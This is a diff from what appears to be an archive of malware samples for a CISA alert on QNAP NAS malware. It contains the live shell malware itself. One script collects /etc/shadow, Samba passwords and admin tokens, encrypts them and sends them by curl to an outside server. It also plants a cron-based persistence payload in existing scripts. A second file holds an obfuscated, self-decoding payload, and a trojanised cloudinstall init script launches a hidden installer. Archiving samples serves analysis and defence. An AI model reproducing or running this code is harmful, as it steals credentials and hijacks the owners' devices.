if [ -f "$file" ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
umount "$mdir"
|
||||
rmdir "$mdir"
|
||||
fi
|
||||
|
||||
if [ ! -f '1548914400_c' ]; then
|
||||
touch '1548914400_c'
|
||||
key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
|
||||
{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /etc/config/uLinux.conf /etc/default_config/uLinux.conf /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf /etc/platform.conf /etc/default_config/BOOT.conf /etc/default_config/Model_Name.conf /etc/config/qid.conf /etc/config/qddns_users.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
|
||||
fi
|
||||
|
||||
if [ ! -f 1549429200_c ]; then
|
||||
touch 1549429200_c
|
||||
test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
|
||||
|
||||
if [ ! -z $cronscriptpath ]; then
|
||||
{ { crontab -l || cat /etc/config/crontab; } | grep -v '^#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
|
||||
test ! -z "$line" || continue
|
||||
test -f "$line" || continue
|
||||
test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
|
||||
rm .tmp.cronCDhLbZ
|
||||
head -n 1 "$line" >.tmp.cronCDhLbZ && grep '^#!/bin/b\?a\?sh' .tmp.cronCDhLbZ || { rm -f .tmp.cronCDhLbZ; continue; }
|
||||
cat >>.tmp.cronCDhLbZ <<"XXEOF"
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
XXEOF
|
||||
cat >>.tmp.cronCDhLbZ <<XXEOF
|
||||
if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
|
||||
test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
|
||||
test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
|
||||
cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
|
||||
XXEOF
|
||||
cat "${cronscriptpath#*/}" >>.tmp.cronCDhLbZ
|
||||
cat >>.tmp.cronCDhLbZ <<XXEOF
|
||||
XEOF
|
||||
chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
|
||||
crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
|
||||
trycount=10; trycount=\$(( \$trycount - 10 ))
|
||||
set x \$crontabargs; shift
|
||||
while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
|
||||
trycount=\$(( \$trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
|
||||
test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "\$crontabfile" "\${confdir}/crontab"; do
|
||||
if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
|
||||
cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
|
||||
cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
|
||||
echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
|
||||
crontab "\$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
||||
XXEOF
|
||||
sed -n '2,$p' "$line" >>.tmp.cronCDhLbZ && mv .tmp.cronCDhLbZ "$line"
|
||||
chmod a+x "$line" || chmod 755 "$line"
|
||||
test -f .tmp.cronCDhLbZ && rm .tmp.cronCDhLbZ
|
||||
done
|
||||
fi
|
||||
fi
|
||||
|
||||
test -f "${ts}_c" || touch "${ts}_c"
|
||||
rm -f "${CWD}/".tmp.*
|
||||
exit 0
|
535
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9
Normal file
535
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9
Normal file
@ -0,0 +1,535 @@
|
||||
#!/bin/sh
|
||||
iifEsx=${ItjkToy}tr
|
||||
EJrRDOD=${yCxo}${cLJbbLDqLZwXv}\\${agYc}${RrjzeLYCRUzos}
|
||||
VmyzjJv=${xlZGXdYXJFYgH}${kWeAeBftiPR}${JFMCQy}${EJrRDOD}${fHGHSADsOyn}13${mGaotN}${WxMnjPT}3
|
||||
CdKAKzH=${wfKXIFWvqOikn}${twRUZectEUG}${CNfQNb}${EJrRDOD}${GSjRhNCYzWG}05${DWpJgo}${kAqrAMV}5
|
||||
bHlsbZa=${myLnvVtWItJnf}${UaUurmZJzSI}${tPxwHu}${EJrRDOD}${mAghPcqqNjE}13${HjcERM}${TqxlNfO}4
|
||||
$iifEsx '>may!'$CdKAKzH'Gju#Y%nJgRNq&hWI<Dc|VpoM{\n}AzOUQKfCL;T'"'"'vribHF]B"kt('$VmyzjJv'` PEx+=Z'$bHlsbZa'$ed*swSl)X' 'JNxBZP#&bktv'$CdKAKzH'MVnc%Ui('$VmyzjJv')I>OwAX`+zjG*KlY|\nqfS TaoLDh!=g}FerQ;Rs'$bHlsbZa'Wd'"'"'$Hpy<]"umC{E' << "EgdaOBDdZ" | ${xUSaSbNWXji}s${WWfYBc}h${jXdVSwF}
|
||||
;Bu xlAbA]/HZ)+YiiU& [kOQv"rSt/Z=Ea68=Z)hmC>'P! l#OBVb"YY$+/NZ)Xp};HVR[tX"BhnuhR/PePZ)y[%CC"/PHZ)(RBPykN|w}}#"v(t.Z)O(XwOV#"NZ)}yA>%"BZ)+HPb#SJ>g"hZ)\$r+w+lo!+bk|Q("Z)v\AYYx"Z)[}h(vLNPlJp "fZ=Ea74=(Z)b+w
|
||||
%##v+YX!m|"Z);aRD[[yNYJ"T=b}Rvm` &oeE134"aPqkBE055\
|
||||
w=s=s=yCWrU{jui;]ZJTxLFY[S>Mz#Xh)+sVgE133QOD!%cl|AER'-<$*NKHdGt(p=T=YZehF=s=s=|W%ERQ coa(t"+xHlvp)ib-'zMwGDTLus};\]E134E055O`gXA<PdrBKE133m[J>jRU&{S$q*V
|
||||
Cy!kN#=ddsbebuk;kubCSscZ;Bu xlAbAf]m/xv|/sweIB|ksbkJ&+JeWJeJJJJAg(yAJsS#eJJJJAg(yAJ-v|S}W1:M4n#eJJJJAg(yAJ-yqS}W2:M12n#eJJJJAg(yAJps<y(BSL}W3:MyMKCMGnLeJJJJbkJM\(JL}ps<y(BLJVJ/\Bo/;ky|\g-JQJWJeJJJJJJJJkBy\JMk|J}&&}"CDU %J$J&J}-yqJMJ}-v|J'J1J+J'J}-v|J++Js#eJJJJJJJJB(wgJL}sLeJJJJnene(g--y|\JMoJ-pbB-<JaJ/\Bo/|;AAJ2al1JQQJ-pbB-<J&+JWJeAg(yAJs;TTvqSiIB|ksbkJ6J6iebBsbJL}2LJllJWJ-p\vkJL}W2$PPPPPPn}s;TTvqL#JB(wgJL}W2$PPPPPPn}s;TTvqL#JnJQQJWJbg;(wJL}W1$PPPPPPn}s;TTvqL#JB(wgJL}W1$$PPPPPPn}s;TTvqL#JneneBqB(J2a/\Bo/|;AAe{Cj[SL}W{Cj[n:/xv|:/sxv|:/;sk/xv|:/;sk/sxv|:/;sk/xv|/P11:/;sk/Ag(yA/sxv|:/;sk/Ag(yA/xv|LebBsbJmJMKJL}W!fh"E_Yj"ZD)nLJQQJWJ<kv|bTJLUybB:JL#JjGS)%jJ\ybB#JBqvbJ0#JneB(wgJLUybB:JY;|JUB(J18J11:56:51J)%jJ2016Le(kSi<kv|bTJ`>k`JQQJB(wgJM|BJ`>k`iebBsbJL}W](knLJMBHJ1JllJB(wgJL}(kLJQQJB(wgJLLebBsbJLq}[jj{_"hth"h"LJSJLq88\\45y\61x9\18x47216856(77T1(3Txx38y191LJQQJBqvbJ0ebBsbJmJMKJL}W0nLJllJbBsbJi<sJy;qJQJIkB<JL}W0nLJQJN(JMAiJMIbJ40JllJBqvbJ0e(g--y|\JMoJg<B|ssAJa/\Bo/|;AAJ2al1JllJWe{ YjUCjCS``epSLyT;{j<wj;-B|0rA7{|k<%)N|3PDx<N;;LebBsbJLq}W"h!fhYj_%hj[ UnLJSJq{ YjJllJbBsbJmJMKJL}W!fh"E_Yj"ZD)nLJllJ(ysBJL}W!fh"E_Yj"ZD)nLJv|J``JQJuOm0M9*uJQJ0uJ+JTyAsBJ##JO0M9*O0M9*O0M9*O0M9*O0M9*O0M9*O0M9*O0M9*J+J\SL}&&Ji\ybBJ'$siJ/J100J++L#JbBsbJL}W!fh"E_Yj"ZD)nLJSJL}W\nLJllJ(bSL}\LJQQJWJbBsbJL}W!fh"E_Yj"ZD)nLJSJL}&&J}\JMJ1++LJllJ(bSL}&&J}\JMJ1J++L#JnJ##Ju+JTyAsBJ##JBsy(JllJbBsbJmJMKJL}W!fh"E_Yj"ZD)nLJllJWe|AS`e`e(ysBJL}W= DjhDj_rhD)j[nLJv|J``JQJuOm0M9*uJQJ0uJ+JTyAsBJ##Ju+JbBsbJL}W= DjhDj_rhD)j[nLJMAbJ2147483646J##JBsy(JllJWJZtYSJkBy\JM\J``JMk|JL}W= DjhDj_rhD)j[nLJ{ YjUCjC#JbBsbJMKJL}{ YjUCjCLJllJ{ YjUCjCSi\\JxsS1J(g;|bSL}= DjhDj_rhD)j[LJ2a/\Bo/|;AAi#JnJQQJbBsbJL}{ YjUCjCLJQQJ{ YjUCjCSi(ybiJQQJBqvbJ0esSL}W{ YjUCjC]]u.nLesbSL}Ws]]uMnLesSL}Ws$$MunLe\SL}&&J}\J/J1000J++LebBsbJmJMKJL}\LJllJbBsbJmJMKJL}sbLJllJbBsbJL}W]sbnLJSJ5JllJWJbBsbJLq}sbLJSJLq}\LJQQJbBsbJLq}sbLJSJLq}&&J}\JMJ1J++L#JnJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#Jne(ysBJL}sLJv|J``JQJuOmyMKCMG0M9/'S}|A*uJ+JbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#J##JBsy(ebSi-pbB-<J/b-</.b-<.PPPPPPiJQQJBqvbJ0e(ybJaJL}bLJVVLh tLJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JneMMMMMdh)ZDJ{fdrZ=JzhEMMMMMe%ZZdgFCDdIpHwpv)9N0dC!htCC =CE8C%ZZdvIz=CEhCRv)'[/1T(r%TjDfoodBse cH06T )-dtzZf ={sR)<C;KUk=zA|d;[gr4wYhb|;qjdDb8FCdK\G'<9HfxCG3 eKy{-cZ\s1I[[A1zt'!8[5xD\Ds9%="pho=fIc)tB3CyAr7p'F/"Pds
|
||||
ksr=z\)z
|
||||
ey['\b=0D\rz\pKwz8HdHK[q='%f)KBB5// IUz\(zBBAy=IKfcy0;v11dG3ZFz<!eA7[gpX[-RK"kc){(;(4pA[9xz4YBCUBw"RFRAvo[!(HYz1sDsNy<c-2HUFR!7wF"e"2sy K;xjfN1'2!zA'%R5YTRg/d8Dg<DE6hC r8E={X[=y<H2yT2GRbwyX22X<TEeKbKFhR5 ptDw6T"IGD<xs;%;4|{yd/kIoc-s
|
||||
q93y|sw4ZBPv{R ;zXdy-fGRZoreqk2hY=2kwI
|
||||
wHIc;vrA[)'[%z63{g\d%tRzH9kr\4w99|Px9'v=-t!9TKczs9YY%eF7qy\)<yxz2yDj<D3KUC;h)Z4G bHqrH
|
||||
Fh[-0xh'G5tCI%dCChSeMMMMMhDUJ{fdrZ=JzhEMMMMMeh tebBsbJmJMKJL}sLJllJwSig<B|ssAJxysB64JM\JVVh tJQJg<B|ssAJksy;bAJM<;xv|JMv|pBRJL}bLJMoBkvTRe}seh teiJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JnebBsbJMTJL}bLJllJk-JL}bLe-SL}W{ YjUCjC$$.unLe{ YjUCjCS``e(ysBJL}-LJv|J``JQJuOmyMKCMG0M9/'S}|A*uJ+JBqvbJ0J##JBsy(epSig<B|ssAJ\IsbJMswy1JMxv|ykRJMw-y(JL}(bLJVVh tJQJg<B|ssAJxysB64e}peh teie-Sig<B|ssAJB|(JM\JMyBsM256M(x(JMpJL}pLJM-\Jswy1JMsyAbJMyJVVh te}-eh teie-wSig<B|ssAJ\IsbJMswy1JMxv|ykRJMw-y(JL}sbLJVVh tJQJg<B|ssAJxysB64e}-eh teiebBsbJmJMKJL}wLJllJbBsbJL}wLJSJL}-wLJQQJBqvbJ0eBoyAJL}-Lebk;BenJQQJWebSi-pbB-<J/b-</.b-<.PPPPPPiJQQJBqvbJ0e(ybJaJL}bLJVVLh tLJQQJWJbBsbJMTJL}bLJllJk-JL}bL#JBqvbJ0#JneMMMMMdh)ZDJ{fdrZ=JzhEMMMMMe%ZZdgFCDdIpHwpv)9N0dC!htCC =CE8C%ZZdvIz=CEhC9!-[%N4FN8= rEzI HT=e0)Gs"YNtIvqj0Av%(42GYksskst)GAU{z35KA\-xfsh!PbtEpUFXBf(p<2yw8t(TeCdtf)8%r|A6Njoq)GNccx%r{UvEg5A/\07dz(xNE;HD<'2//2\;pq=Ryp ZZ|ZHterIk%5|o<5dzdd((%A%dystbqGTtIbDFA!9v9-DTv53|yAk%{"gA9zvT
|
||||
1Eq-rN1'e7)j;FtYARz9C<ov/GZ2R/oR-6D
|
||||
x
|
||||
hsyh5d9IIPcEkXqAxzq%ZK
|
||||
;PT18Y2<48twe<XfREc0-FUf(3Yvc"4"v{vp{<j!IpYFR90y%zkg
|
||||
=C\9%6(GbTN=Kw%xoRbD-\b\eEqdDD|0t-!51(r{('\<yZZq2v/2()\[E8GCFdU%d%dpFZB2ItI(6Ac0
|
||||
Aj638K'eN7/-{'w(=grXfv)Yvh;-K3fr5{-gXy3N2b04"y70{r
|
||||
C<)sZ/I<[R[0
|
||||
8v6RXd[heHfsy!q|d toR'vYg-RtvA2\qz!rFjNRGd|8'1z-g|c2<CI%dCChSeMMMMMhDUJ{fdrZ=JzhEMMMMMeh teg<B|ssAJksy;bAJM<;xv|JMv|pBRJL}bLJMB|(kR<bJVVh tJQJg<B|ssAJxysB64e}peh tek-JL}bLebk;BJen#Jbk;B#JnJQQJWebBsbJLq}C==h{j_rCD)fC)hLJSJLqB\(386809(688\B1295x5T3(449y738176(T1T4TLJllJBoyAJL}W[jj{_fYh"_C)hDjnLenebBsbJMTJL}bLJllJk-JL}bLesABB<J1eBqvbJ0efbebuk;kubCSfZ=Ea63=HSr+ZC&
|
||||
Y#LLXo'ZssTZ=Ea37=55Z#'&Bmrta#wZssTsZ;Bu xlAbAsftahYT0ffG
|
||||
EgdaOBDdZ
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 1; }
|
||||
esac
|
||||
{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 0; }
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
